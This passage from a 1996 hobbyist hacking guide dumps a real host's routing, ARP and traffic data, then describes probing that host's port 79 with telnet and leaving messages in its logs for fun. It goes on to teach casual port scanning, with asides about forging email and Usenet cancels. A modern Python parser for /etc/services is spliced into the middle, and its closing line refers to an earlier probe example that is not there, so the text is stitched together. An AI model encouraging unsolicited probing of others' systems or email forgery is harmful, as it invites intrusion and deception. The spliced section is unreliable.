204.134.82 GLORY.NM.ORG Up,Gateway 0 29766 se0 1500
192.41.211 GLORY.NM.ORG Up,Gateway 0 155 se0 1500
192.189.147 LAWRII.NM.ORG Up,Gateway 0 3133 se0 1500
204.134.84 PENNY.NM.ORG Up,Gateway 0 189 se0 1500
204.134.87 LAWRII.NM.ORG Up,Gateway 0 94 se0 1500
146.88.0 GLORY.NM.ORG Up,Gateway 0 140 se0 1500
192.84.24 GLORY.NM.ORG Up,Gateway 0 3530 se0 1500
204.134.88 LAWRII.NM.ORG Up,Gateway 0 136 se0 1500
198.49.217 GLORY.NM.ORG Up,Gateway 0 303 se0 1500
192.132.89 GLORY.NM.ORG Up,Gateway 0 3513 se0 1500
198.176.219 GLORY.NM.ORG Up,Gateway 0 1278 se0 1500
206.206.92 LAWRII.NM.ORG Up,Gateway 0 1228 se0 1500
192.234.220 129.121.1.91 Up,Gateway 0 2337 se0 1500
204.134.92 LAWRII.NM.ORG Up,Gateway 0 13995 se0 1500
198.59.157 LAWRII.NM.ORG Up,Gateway 0 508 se0 1500
206.206.93 GLORY.NM.ORG Up,Gateway 0 635 se0 1500
204.134.93 GLORY.NM.ORG Up,Gateway 0 907 se0 1500
198.59.158 LAWRII.NM.ORG Up,Gateway 0 14214 se0 1500
198.59.159 LAWRII.NM.ORG Up,Gateway 0 1806 se0 1500
204.134.95 PENNY.NM.ORG Up,Gateway 0 3644 se0 1500
206.206.96 GLORY.NM.ORG Up,Gateway 0 990 se0 1500
206.206.161 LAWRII.NM.ORG Up,Gateway 0 528 se0 1500
198.59.97 PENNY.NM.ORG Up,Gateway 0 55 se0 1500
198.59.161 LAWRII.NM.ORG Up,Gateway 0 497 se0 1500
192.207.226 GLORY.NM.ORG Up,Gateway 0 93217 se0 1500
198.59.99 PENNY.NM.ORG Up,Gateway 0 2 se0 1500
198.59.163 GLORY.NM.ORG Up,Gateway 0 3379 se0 1500
192.133.100 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
204.134.100 GLORY.NM.ORG Up,Gateway 0 8 se0 1500
128.165.0 PENNY.NM.ORG Up,Gateway 0 15851 se0 1500
198.59.165 GLORY.NM.ORG Up,Gateway 0 274 se0 1500
206.206.165 LAWRII.NM.ORG Up,Gateway 0 167 se0 1500
206.206.102 GLORY.NM.ORG Up,Gateway 0 5316 se0 1500
160.230.0 LAWRII.NM.ORG Up,Gateway 0 19408 se0 1500
206.206.166 LAWRII.NM.ORG Up,Gateway 0 1756 se0 1500
205.166.231 GLORY.NM.ORG Up,Gateway 0 324 se0 1500
198.59.167 GLORY.NM.ORG Up,Gateway 0 1568 se0 1500
206.206.103 GLORY.NM.ORG Up,Gateway 0 3629 se0 1500
198.59.168 GLORY.NM.ORG Up,Gateway 0 9063 se0 1500
206.206.104 GLORY.NM.ORG Up,Gateway 0 7333 se0 1500
206.206.168 GLORY.NM.ORG Up,Gateway 0 234 se0 1500
204.134.105 LAWRII.NM.ORG Up,Gateway 0 4826 se0 1500
206.206.105 LAWRII.NM.ORG Up,Gateway 0 422 se0 1500
204.134.41 LAWRII.NM.ORG Up,Gateway 0 41782 se0 1500
206.206.169 GLORY.NM.ORG Up,Gateway 0 5101 se0 1500
204.134.42 GLORY.NM.ORG Up,Gateway 0 10761 se0 1500
206.206.170 GLORY.NM.ORG Up,Gateway 0 916 se0 1500
198.49.44 GLORY.NM.ORG Up,Gateway 0 3 se0 1500
198.59.108 GLORY.NM.ORG Up,Gateway 0 2129 se0 1500
204.29.236 GLORY.NM.ORG Up,Gateway 0 125 se0 1500
206.206.172 GLORY.NM.ORG Up,Gateway 0 5839 se0 1500
204.134.108 GLORY.NM.ORG Up,Gateway 0 3216 se0 1500
206.206.173 GLORY.NM.ORG Up,Gateway 0 374 se0 1500
198.175.173 LAWRII.NM.ORG Up,Gateway 0 6227 se0 1500
198.59.110 GLORY.NM.ORG Up,Gateway 0 1797 se0 1500
198.51.238 GLORY.NM.ORG Up,Gateway 0 1356 se0 1500
192.136.110 GLORY.NM.ORG Up,Gateway 0 583 se0 1500
204.134.48 GLORY.NM.ORG Up,Gateway 0 42 se0 1500
198.175.176 LAWRII.NM.ORG Up,Gateway 0 32 se0 1500
206.206.114 LAWRII.NM.ORG Up,Gateway 0 44 se0 1500
206.206.179 LAWRII.NM.ORG Up,Gateway 0 14 se0 1500
198.59.179 PENNY.NM.ORG Up,Gateway 0 222 se0 1500
198.59.115 GLORY.NM.ORG Up,Gateway 1 132886 se0 1500
206.206.181 GLORY.NM.ORG Up,Gateway 0 1354 se0 1500
206.206.182 SIENNA.NM.ORG Up,Gateway 0 16 se0 1500
206.206.118 GLORY.NM.ORG Up,Gateway 0 3423 se0 1500
206.206.119 GLORY.NM.ORG Up,Gateway 0 282 se0 1500
206.206.183 SIENNA.NM.ORG Up,Gateway 0 2473 se0 1500
143.120.0 LAWRII.NM.ORG Up,Gateway 0 123533 se0 1500
206.206.184 GLORY.NM.ORG Up,Gateway 0 1114 se0 1500
205.167.120 GLORY.NM.ORG Up,Gateway 0 4202 se0 1500
206.206.121 GLORY.NM.ORG Up,Gateway 1 71 se0 1500
129.121.0 GRANDE.NM.ORG Up 12 21658599 se0 1500
204.134.122 GLORY.NM.ORG Up,Gateway 0 195 se0 1500
204.134.58 GLORY.NM.ORG Up,Gateway 0 7707 se0 1500
128.123.0 GLORY.NM.ORG Up,Gateway 0 34416 se0 1500
204.134.59 GLORY.NM.ORG Up,Gateway 0 1007 se0 1500
204.134.124 GLORY.NM.ORG Up,Gateway 0 37160 se0 1500
206.206.124 LAWRII.NM.ORG Up,Gateway 0 79 se0 1500
206.206.125 PENNY.NM.ORG Up,Gateway 0 233359 se0 1500
204.134.126 GLORY.NM.ORG Up,Gateway 0 497 se0 1500
206.206.126 LAWRII.NM.ORG Up,Gateway 0 13644 se0 1500
204.69.190 GLORY.NM.ORG Up,Gateway 0 4059 se0 1500
206.206.190 GLORY.NM.ORG Up,Gateway 0 1630 se0 1500
204.134.127 GLORY.NM.ORG Up,Gateway 0 45621 se0 1500
206.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 1500
MultiNet IPX Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
MultiNet ARP table:
Host Network Address Ethernet Address Arp Flags
-------------------------------------------- ---------------- ---------
GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 Temporary
[UNKNOWN] (IP 129.121.251.1) 00:C0:05:01:2C:D2 Temporary
NARANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42 Temporary
CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 Temporary
[UNKNOWN] (IP 129.121.251.5) AA:00:04:00:D2:D0 Temporary
LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 Temporary
[UNKNOWN] (IP 129.121.1.91) 00:C0:05:01:2C:D2 Temporary
BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 Temporary
PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 Temporary
ARRIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7 Temporary
AZUL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3 Temporary
ENSS365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58 Temporary
AVATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D Temporary
[UNKNOWN] (IP 129.121.253.2) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 Temporary
CONCHAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporary
MultiNet Network Interface statistics:
Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- ------
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0
MultiNet Protocol statistics:
65264173 IP packets received
22 IP packets smaller than minimum size
6928 IP fragments received
4 IP fragments timed out
34 IP received for unreachable destinations
704140 ICMP error packets generated
9667 ICMP opcodes out of range
4170 Bad ICMP packet checksums
734363 ICMP responses
734363 ICMP "Echo" packets received
734363 ICMP "Echo Reply" packets sent
18339 ICMP "Echo Reply" packets received
704140 ICMP "Destination Unreachable" packets sent
451243 ICMP "Destination Unreachable" packets received
1488 ICMP "Source Quench" packets received
163911 ICMP "ReDirect" packets received
189732 ICMP "Time Exceeded" packets received
126966 TCP connections initiated
233998 TCP connections established
132611 TCP connections accepted
67972 TCP connections dropped
28182 embryonic TCP connections dropped
269399 TCP connections closed
10711838 TCP segments timed for RTT
10505140 TCP segments updated RTT
3927264 TCP delayed ACKs sent
666 TCP connections dropped due to retransmit timeouts
111040 TCP retransmit timeouts
3136 TCP persist timeouts
9 TCP persist connection drops
16850 TCP keepalive timeouts
1195 TCP keepalive probes sent
14392 TCP connections dropped due to keepalive timeouts
28842663 TCP packets sent
12714484 TCP data packets sent
1206060086 TCP data bytes sent
58321 TCP data packets retransmitted
22144036 TCP data bytes retransmitted
6802199 TCP ACK-only packets sent
1502 TCP window probes sent
483 TCP URG-only packets sent
8906175 TCP Window-Update-only packets sent
359509 TCP control packets sent
38675084 TCP packets received
28399363 TCP packets received in sequence
1929418386 TCP bytes received in sequence
25207 TCP packets with checksum errors
273374 TCP packets were duplicates
230525708 TCP bytes were duplicates
3748 TCP packets had some duplicate bytes
493214 TCP bytes were partial duplicates
2317156 TCP packets were out of order
3151204672 TCP bytes were out of order
1915 TCP packets had data after window
865443 TCP bytes were after window
5804 TCP packets for already closed connection
941 TCP packets were window probes
10847459 TCP packets had ACKs
222657 TCP packets had duplicate ACKs
1 TCP packet ACKed unsent data
1200274739 TCP bytes ACKed
141545 TCP packets had window updates
13 TCP segments dropped due to PAWS
4658158 TCP segments were predicted pure-ACKs
24033756 TCP segments were predicted pure-data
8087980 TCP PCB cache misses
305 Bad UDP header checksums
17 Bad UDP data length fields
23772272 UDP PCB cache misses
MultiNet Buffer Statistics:
388 out of 608 buffers in use:
30 buffers allocated to Data.
10 buffers allocated to Packet Headers.
66 buffers allocated to Socket Structures.
57 buffers allocated to Protocol Control Blocks.
163 buffers allocated to Routing Table Entries.
2 buffers allocated to Socket Names and Addresses.
48 buffers allocated to Kernel Fork-Processes.
2 buffers allocated to Interface Addresses.
1 buffer allocated to Multicast Addresses.
1 buffer allocated to Timeout Callbacks.
6 buffers allocated to Memory Management.
2 buffers allocated to Network TTY Control Blocks.
11 out of 43 page clusters in use.
11 CXBs borrowed from VMS device drivers
2 CXBs waiting to return to the VMS device drivers
162 Kbytes allocated to MultiNet buffers (44% in use).
226 Kbytes of allocated buffer address space (0% of maximum).
Connection closed by foreign host.
[68] ->
Whoa! What was all that?
What we did was telnet to port 15 -- the netstat port -- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connections made by all the computers linked to the Internet through this computer.
So from this we learned two things:
1) Grande.nm.org is a very busy and important computer.
2) Even a very busy and important computer can let the random port surfer come and play.
So my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the command:
[68] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
finger
?Sorry, could not find "FINGER"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
help
?Sorry, could not find "HELP"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
?
?Sorry, could not find "?"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
man
?Sorry, could not find "MAN"
Connection closed by foreign host.
[69] ->
At first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command “finger” and grande.nm.org said ‘?Sorry, could not find "FINGER"’, we knew this port was not following IETF rules.
Now on many computers they don’t run the finger daemon at all. This is because finger has some properties that can be used to gain total control of the computer that runs it.
But if finger is shut down, and nothing else is running on port 79, we would get the answer:
telnet: connect: Connection refused.
But instead we got connected and grande.nm.org was waiting for a command.
Now the normal thing a port surfer does when running into an unfamiliar daemon is to coax it into revealing what commands it uses. “Help,” “?” and “man” often work. But they didn’t help us.
But even though these commands didn’t help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructions.
So what did we do next? We decided to be good Internet citizens and also stay out of jail. We decided we’d better log off.
But there was one hack we decided to do first: leave our mark on the shell log file.
The shell log file keeps a record of all operating system commands made on a computer. The administrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we typed while connected was saved on a log.
So my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she’s hooked on hacking. Hmmm, it could be a good way to meet cute sysadmins...
So, port surf’s up! If you want to surf, here’s the basics:
1) Get logged on to a shell account. That’s an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet.
2) Give the command “telnet <hostname> <port>” where <hostname> is the Internet address of the computer you want to visit and <port> is whatever looks phun to you.
3) If you get the response “Connected to <hostname>.” then surf’s up!
Following are some of my favorite ports. It is legal and harmless to pay them visits so long as you don’t figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking, you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds good...
Port number Service Why it’s phun!
7 echo Whatever you type in, the host repeats back to you, used for ping
9 discard /dev/null -- how fast can you figure out this one?
11 systat Lots of info on users
13 daytime Time and date at computer’s location
15 netstat Tremendous info on networks but rarely used any more
19 chargen Pours out a stream of ASCII characters. Use ^C to stop.
21 ftp Transfers files
22 ssh secure shell login -- encrypted tunnel
23 telnet Where you log in if you don’t use ssh:)
25 smtp Forge email from Bill.Gates@Microsoft.org.
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used!
syslog Remote system logging -- how we bust hackers
520 route Routing information protocol
**************************
Propeller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpected!
If you have a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services.
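The /etc/services file mentioned above has a simple line format: service name, then port/protocol, then optional aliases, with `#` starting a comment. The parser below is an added example, not from the original guide; it works on a constructed, abridged excerpt written in that format from the standard assignments (check your own /etc/services for the authoritative list). It also shows why the table above lists “who” under 513 and “syslog” under 514 without a port number of their own: those are the UDP services sharing a port with the TCP services rlogin and shell.

```python
from __future__ import annotations

import re

# Constructed excerpt in /etc/services format, abridged to the ports the
# guide's table mentions. The real file on any Unix host is far longer.
SAMPLE_SERVICES = """\
# Network services, Internet style
echo        7/tcp
echo        7/udp
discard     9/tcp      sink null
systat      11/tcp     users
daytime     13/tcp
netstat     15/tcp
chargen     19/tcp     ttytst source
ftp         21/tcp
ssh         22/tcp
telnet      23/tcp
smtp        25/tcp     mail
whois       43/tcp     nicname
domain      53/tcp
domain      53/udp
finger      79/tcp
http        80/tcp     www
pop3        110/tcp    pop-3
nntp        119/tcp    readnews untp
https       443/tcp
exec        512/tcp
biff        512/udp    comsat
login       513/tcp
who         513/udp    whod
shell       514/tcp    cmd
syslog      514/udp
route       520/udp    router routed
"""

PORT_PROTO = re.compile(r"(\d+)/(tcp|udp)")


def parse_services(text: str) -> dict[tuple[int, str], list[str]]:
    """Map (port, protocol) -> [canonical name, alias, ...].
    Comments after '#' and blank lines are skipped, as the real file allows;
    malformed lines are ignored rather than raising."""
    table: dict[tuple[int, str], list[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        m = PORT_PROTO.fullmatch(fields[1])
        if not m:
            continue
        port, proto = int(m.group(1)), m.group(2)
        table[(port, proto)] = [fields[0]] + fields[2:]
    return table


def services_on_port(table: dict[tuple[int, str], list[str]], port: int) -> dict[str, str]:
    """Every service registered on a port, keyed by protocol. More than one
    service can share a port number, as the guide's tip notes."""
    return {proto: names[0] for (p, proto), names in sorted(table.items()) if p == port}


def lookup_by_name(table: dict[tuple[int, str], list[str]], name: str) -> list[tuple[int, str]]:
    """Reverse lookup by canonical name or alias, e.g. 'mail' -> [(25, 'tcp')]."""
    return [key for key, names in table.items() if name in names]


if __name__ == "__main__":
    table = parse_services(SAMPLE_SERVICES)
    for port in (15, 79, 512, 513, 514):
        print(port, services_on_port(table, port))
    print("mail ->", lookup_by_name(table, "mail"))
```

Because a host may bind anything to any port, this mapping only tells you what a port is supposed to be; the previous example’s probe tells you what actually answers, and a mismatch between the two is what an administrator should chase down.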
********************************
_________________________________________________________
To subscribe to the Happy Hacker list, email hacker@techbroker.com with message “subscribe hh.” To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________________________